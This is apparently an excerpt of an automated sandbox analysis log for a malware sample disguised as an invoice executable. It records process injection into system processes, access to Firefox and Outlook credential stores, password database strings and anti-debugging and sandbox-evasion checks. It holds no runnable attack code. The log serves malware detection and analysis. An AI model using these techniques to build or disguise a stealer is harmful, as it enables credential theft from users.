            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003042A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource | 0_2_003042A2
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | File created: C:\Users\user\AppData\Local\Temp\undiscernibly
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PROFOMA INVOICE SHEET.exe | ReversingLabs: Detection: 50%
            Source: PROFOMA INVOICE SHEET.exe | Virustotal: Detection: 25%
            Source: unknown | Process created: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Process created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe"
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Process created: C:\Windows\SysWOW64\TapiUnattend.exe "C:\Windows\SysWOW64\TapiUnattend.exe"
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: wdscore.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: PROFOMA INVOICE SHEET.exe | Static file information: File size 1722368 > 1048576
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: TapiUnattend.pdbGCTL source: svchost.exe, 00000001.00000002.2117869256.0000000003619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2117847522.0000000003600000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150058173.0000000000747000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bJWYsPIiPtg.exe, 00000005.00000002.4149955511.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, bJWYsPIiPtg.exe, 00000007.00000000.2210396231.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700292312.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PROFOMA INVOICE SHEET.exe, 00000000.00000003.1701875462.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2019260041.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2017040925.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2140485338.000000000312B000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.000000000347E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2135530288.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700292312.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PROFOMA INVOICE SHEET.exe, 00000000.00000003.1701875462.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2019260041.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2017040925.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, TapiUnattend.exe, 00000006.00000003.2140485338.000000000312B000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.000000000347E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2135530288.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: TapiUnattend.exe, 00000006.00000002.4151512701.000000000390C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.000000000294C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2439300698.000000002304C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: TapiUnattend.exe, 00000006.00000002.4151512701.000000000390C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.000000000294C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2439300698.000000002304C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: TapiUnattend.pdb source: svchost.exe, 00000001.00000002.2117869256.0000000003619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2117847522.0000000003600000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150058173.0000000000747000.00000004.00000020.00020000.00000000.sdmp
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: PROFOMA INVOICE SHEET.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_003042DE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00320A76 push ecx; ret | 0_2_00320A89
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414856 pushfd ; ret | 1_2_00414857
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417869 push edi; iretd | 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417821 push edi; iretd | 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040717F push 00000019h; iretd | 1_2_0040719C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004061B5 push esp; ret | 1_2_004061BB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403240 push eax; ret | 1_2_00403242
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00412268 push ds; retf | 1_2_0041226D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041222B push ss; iretd | 1_2_00412293
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041AAF3 push esi; iretd | 1_2_0041AAFA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00412285 push ss; iretd | 1_2_00412293
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00404BA0 pushad ; ret | 1_2_00404BA4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414562 push ebp; retf | 1_2_004145CB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414566 push ebp; retf | 1_2_004145CB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00426D33 push edi; retf | 1_2_00426D3C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418DBC push eax; iretd | 1_2_00418DC1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401E4C push BCBDF130h; retf | 1_2_00401EB7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401E3E push esi; iretd | 1_2_00401E49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401F00 push BCBDF130h; retf | 1_2_00401EB7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004177EE push edi; iretd | 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004177F3 push edi; iretd | 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004147F2 pushad ; iretd | 1_2_004147FA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004177FD push edi; iretd | 1_2_004177FC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C309AD push ecx; mov dword ptr [esp], ecx | 1_2_03C309B6
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_033109AD push ecx; mov dword ptr [esp], ecx | 6_2_033109B6
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_028F4626 push edi; iretd | 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_028F45AB push edi; iretd | 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_028F45BA push edi; iretd | 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_028F45B0 push edi; iretd | 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_028F45DE push edi; iretd | 6_2_028F45B9
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_028EEFE8 push ss; iretd | 6_2_028EF050
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0031F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_0031F98E
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00391C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_00391C41
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep | graph_0-96936
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | API/Special instruction interceptor: Address: 3DBC6A4
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc | 1_2_03C7096E
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Window / User API: threadDelayed 2986
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Window / User API: threadDelayed 6987
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | API coverage: 3.6 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | API coverage: 2.7 %
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 7828 | Thread sleep count: 2986 > 30
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 7828 | Thread sleep time: -5972000s >= -30000s
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 7828 | Thread sleep count: 6987 > 30
            Source: C:\Windows\SysWOW64\TapiUnattend.exe TID: 7828 | Thread sleep time: -13974000s >= -30000s
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe TID: 7860 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe TID: 7860 | Thread sleep time: -42000s >= -30000s
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe TID: 7860 | Thread sleep count: 33 > 30
            Source: C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe TID: 7860 | Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003768EE FindFirstFileW,FindClose | 0_2_003768EE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0037698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_0037698F
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0036D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0036D076
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0036D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_0036D3A9
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00379642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00379642
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0037979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_0037979D
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00379B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00379B2B
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0036DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_0036DBBE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00375C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_00375C97
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Code function: 6_2_028FC5F0 FindFirstFileW,FindNextFileW,FindClose | 6_2_028FC5F0
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_003042DE
            Source: bJWYsPIiPtg.exe, 00000007.00000002.4150315020.00000000009BF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
            Source: firefox.exe, 00000008.00000002.2444658727.000001C6A2EBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\TapiUnattend.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C7096E rdtsc | 1_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417773 LdrLoadDll | 1_2_00417773
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_0037EAA2 BlockInput | 0_2_0037EAA2
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00332622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_00332622
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_003042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_003042DE
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_00324CE8 mov eax, dword ptr fs:[00000030h] | 0_2_00324CE8
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_03DBC970 mov eax, dword ptr fs:[00000030h] | 0_2_03DBC970
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_03DBC910 mov eax, dword ptr fs:[00000030h] | 0_2_03DBC910
            Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe | Code function: 0_2_03DBB2E0 mov eax, dword ptr fs:[00000030h] | 0_2_03DBB2E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h] | 1_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 1_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h] | 1_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] | 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 1_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] | 1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h] | 1_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 1_2_03C403E9
